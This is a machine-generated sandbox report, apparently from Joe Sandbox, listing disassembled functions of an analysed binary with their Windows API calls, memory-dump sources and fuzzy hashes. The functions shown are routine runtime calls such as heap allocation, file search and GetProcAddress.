                                                                                                                    • Instruction ID: e7a29cf84eef25fb62904f49b54215a9b74c29fe6333c6409e481b8af9d7d631
                                                                                                                    • Opcode Fuzzy Hash: 5867490fb770ca9928962a48f9ad7a0c70cbe8cadfeea8ac20a692dfaf899d72
                                                                                                                    • Instruction Fuzzy Hash: 4DC0123605C200BECB010BB6DC09C2BBBA8ABA5316F24C90AB0A5D0071C239C114DB11
                                                                                                                    Function 00E31A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: ab534b0b63b9c987dd7fd4dada73073a1eb019252ebbd5b5e3d79ef07faaf51a
                                                                                                                    • Instruction ID: 50d4aff35c104b9b19ba49992d5c0050ba6148a6cbe4e5ac063475a776ba1b24
                                                                                                                    • Opcode Fuzzy Hash: ab534b0b63b9c987dd7fd4dada73073a1eb019252ebbd5b5e3d79ef07faaf51a
                                                                                                                    • Instruction Fuzzy Hash: B5C19130A002549FEF19CF78C49CBA9BFA5AF56314F0821FDEC45AB296DB319944CB61
                                                                                                                    Function 00E33BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: dd54857c54131c2d77c91de639ac4e506152cc40b30f5deba53bb26c85c3b4c6
                                                                                                                    • Instruction ID: c069eeee77e230f743cd61cfbe587fb338d967cf30ebecfb4b52f97ced79edfd
                                                                                                                    • Opcode Fuzzy Hash: dd54857c54131c2d77c91de639ac4e506152cc40b30f5deba53bb26c85c3b4c6
                                                                                                                    • Instruction Fuzzy Hash: FC71C371500B449EDB35DB70C859DE7FBE9AF14301F40696EE2EBA7241DA326A88CF11
                                                                                                                    Function 00E38284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E38289
                                                                                                                      • Part of subcall function 00E313DC: __EH_prolog.LIBCMT ref: 00E313E1
                                                                                                                      • Part of subcall function 00E3A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E3A598
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$CloseFind
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2506663941-0
                                                                                                                    • Opcode ID: 38d90218f2ab6f3c4af9a35fc879334b81401e5e527b78da3a5e0ad0d76aead4
                                                                                                                    • Instruction ID: 3ec227ef4910886a5abdefd3a7a46a8fbacdcc8a6249be62c05293c96550ebd3
                                                                                                                    • Opcode Fuzzy Hash: 38d90218f2ab6f3c4af9a35fc879334b81401e5e527b78da3a5e0ad0d76aead4
                                                                                                                    • Instruction Fuzzy Hash: 0641B8719447589ADB20DB60CD59AEABBF8AF00304F4414EAF18AB7193EB715FC4CB10
                                                                                                                    Function 00E313E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E313E1
                                                                                                                      • Part of subcall function 00E35E37: __EH_prolog.LIBCMT ref: 00E35E3C
                                                                                                                      • Part of subcall function 00E3CE40: __EH_prolog.LIBCMT ref: 00E3CE45
                                                                                                                      • Part of subcall function 00E3B505: __EH_prolog.LIBCMT ref: 00E3B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 8a52e5a65dd2d3fbe8daeeaf8d602cc99cc0bb75788a62a4be0f2c8eabf4cc2a
                                                                                                                    • Instruction ID: 22ec83e9130699c9536280721e7158ac8616890874df0bcc5f2a3acdcc06a573
                                                                                                                    • Opcode Fuzzy Hash: 8a52e5a65dd2d3fbe8daeeaf8d602cc99cc0bb75788a62a4be0f2c8eabf4cc2a
                                                                                                                    • Instruction Fuzzy Hash: 2D4149B0905B409EE724DF398889AE6FBE5BF18300F50596ED5FF93282CB326654CB10
                                                                                                                    Function 00E313DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E313E1
                                                                                                                      • Part of subcall function 00E35E37: __EH_prolog.LIBCMT ref: 00E35E3C
                                                                                                                      • Part of subcall function 00E3CE40: __EH_prolog.LIBCMT ref: 00E3CE45
                                                                                                                      • Part of subcall function 00E3B505: __EH_prolog.LIBCMT ref: 00E3B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: b4c594e0e6028c0db4a4a9796cc5cbdcbbfba64d382e1dda34fd20206c77a4f2
                                                                                                                    • Instruction ID: 7066e05487632c6ad683de92bf70fd11bc1ee4ba0fe406e72289afb78471beec
                                                                                                                    • Opcode Fuzzy Hash: b4c594e0e6028c0db4a4a9796cc5cbdcbbfba64d382e1dda34fd20206c77a4f2
                                                                                                                    • Instruction Fuzzy Hash: 134146B0905B409EE724DF798889AE6FBE5BF18300F50596ED5FF93282CB326654CB10
                                                                                                                    Function 00E4B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E4B098
                                                                                                                      • Part of subcall function 00E313DC: __EH_prolog.LIBCMT ref: 00E313E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: ef20f94c209509bbd130d3b1bfeafb0c72259c08795eb67969c24cae8a71ceb6
                                                                                                                    • Instruction ID: 5174e503905baf8aaf57bb06fcaf017c4f015feef7e321802a3926d74722f60b
                                                                                                                    • Opcode Fuzzy Hash: ef20f94c209509bbd130d3b1bfeafb0c72259c08795eb67969c24cae8a71ceb6
                                                                                                                    • Instruction Fuzzy Hash: 86317A71C01249EBCF15DFA9D851AEEBBF4AF09304F1054AEE809B7242DB35AE04CB61
                                                                                                                    Function 00E5AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00E5ACF8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    • Opcode ID: 77dcd41c50a694cfff69db6f7fbe66d21bc6bddc0273917ab21f6c27d7940336
                                                                                                                    • Instruction ID: 3dd4655db5b51ba8add1580dc6e07e8cf5e041e994fd308f493e4f43b10f4a96
                                                                                                                    • Opcode Fuzzy Hash: 77dcd41c50a694cfff69db6f7fbe66d21bc6bddc0273917ab21f6c27d7940336
                                                                                                                    • Instruction Fuzzy Hash: EA112B376001255F8B219E1DEC4049BB3A5AB8436A71E5B31FD15BB244D630EC0987D1
                                                                                                                    Function 00E39215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 25fb8290ac5ecf8d707235e6e7a31eebe0e361b0f4a9124e64bff8236cd297c1
                                                                                                                    • Instruction ID: 139379ed919458f46042a3110455546a13808edb31f6e83e17c94af9e85c50cb
                                                                                                                    • Opcode Fuzzy Hash: 25fb8290ac5ecf8d707235e6e7a31eebe0e361b0f4a9124e64bff8236cd297c1
                                                                                                                    • Instruction Fuzzy Hash: D0016573900968ABCF21ABA8DC899DFBFB5BF88750F015515E816B7262DB748D04C6A0
                                                                                                                    Function 00E5C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E5B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E59813,00000001,00000364,?,00E53F73,00000050,?,00E71030,00000200), ref: 00E5B177
                                                                                                                    • _free.LIBCMT ref: 00E5C4E5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 614378929-0
                                                                                                                    • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                    • Instruction ID: b16fdf9a5fee3a026c895a02243cc1aef1f44c85fa679ac100208717f243c15c
                                                                                                                    • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                    • Instruction Fuzzy Hash: C20126722003056FE3318E659891D6AFBEDFB85331F251A2DE994A3281EA30A809C734
                                                                                                                    Function 00E5B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E59813,00000001,00000364,?,00E53F73,00000050,?,00E71030,00000200), ref: 00E5B177
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: 332cc426bd95658f21eda9c8d08722514c5e988f10413479b6e34d14de44251f
                                                                                                                    • Instruction ID: aeac56c6a8b074477d0355b2620fc2aa12b05de11906a6242cafea395d25c313
                                                                                                                    • Opcode Fuzzy Hash: 332cc426bd95658f21eda9c8d08722514c5e988f10413479b6e34d14de44251f
                                                                                                                    • Instruction Fuzzy Hash: 6FF0BB3250792477DBA15A72AE25B9F7788AB41762B146951FC08BA191CB20D90D86E0
                                                                                                                    Function 00E53C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00E53C3F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    • Opcode ID: cfdc8325269e73b15ccb71cb668ff04741b10302e114cf1d1621cf8c6582ef00
                                                                                                                    • Instruction ID: 162805daee37ca7ea8906e1e94136affdbaa64fbc2e69921097b22c7e07012b7
                                                                                                                    • Opcode Fuzzy Hash: cfdc8325269e73b15ccb71cb668ff04741b10302e114cf1d1621cf8c6582ef00
                                                                                                                    • Instruction Fuzzy Hash: 2CF0A7322042169F8F114EB9FC0099AB799EF01BA67105925FE05F7190DB31DA28C7B0
                                                                                                                    Function 00E58E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E5CA2C,00000000,?,00E56CBE,?,00000008,?,00E591E0,?,?,?), ref: 00E58E38
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: 58d0afbdb4f454e329c71a823247a89640b3c3ca5aac697ccb9fe58e30070747
                                                                                                                    • Instruction ID: c53cbe51f8065715dee0caa1f2a9831cde56defeb504a61862c8ee0e45aded1c
                                                                                                                    • Opcode Fuzzy Hash: 58d0afbdb4f454e329c71a823247a89640b3c3ca5aac697ccb9fe58e30070747
                                                                                                                    • Instruction Fuzzy Hash: EFE0653120612556EA712666AE06B9F76A89B417AAF153911EC59B60A2DF60CC0881E1
                                                                                                                    Function 00E35ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E35AC2
                                                                                                                      • Part of subcall function 00E3B505: __EH_prolog.LIBCMT ref: 00E3B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 5d3cf2180c0c1694ec0a09490aff35de1658b78e00296f59ad93553e25bf25f5
                                                                                                                    • Instruction ID: 7f3f28826b22f2f20d216572414fed640926bd3e8dcf0ceff90102cbebc15207
                                                                                                                    • Opcode Fuzzy Hash: 5d3cf2180c0c1694ec0a09490aff35de1658b78e00296f59ad93553e25bf25f5
                                                                                                                    • Instruction Fuzzy Hash: 8E018C30810690DED725EBB8E045BDDFBE4DF64304F51A49EA55773682CBB42B08D7A2
                                                                                                                    Function 00E3A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E3A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00E3A592,000000FF,?,?), ref: 00E3A6C4
                                                                                                                      • Part of subcall function 00E3A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00E3A592,000000FF,?,?), ref: 00E3A6F2
                                                                                                                      • Part of subcall function 00E3A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00E3A592,000000FF,?,?), ref: 00E3A6FE
                                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E3A598
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1464966427-0
                                                                                                                    • Opcode ID: 6b03b85072d6071610bfe9f87106656b7b84853b414cf713e376380f1fb5ff2b
                                                                                                                    • Instruction ID: 6c29e3cc1c8be8f08cf9f689531c90b15aba8b22929e6b446a4a1fc45f0bea7a
                                                                                                                    • Opcode Fuzzy Hash: 6b03b85072d6071610bfe9f87106656b7b84853b414cf713e376380f1fb5ff2b
                                                                                                                    • Instruction Fuzzy Hash: A6F05E31008790AACB625BB48909BDB7FD06F1A321F089A4DF1F9621A6C27550D8DB23
                                                                                                                    Function 00E40E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00E40E3D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
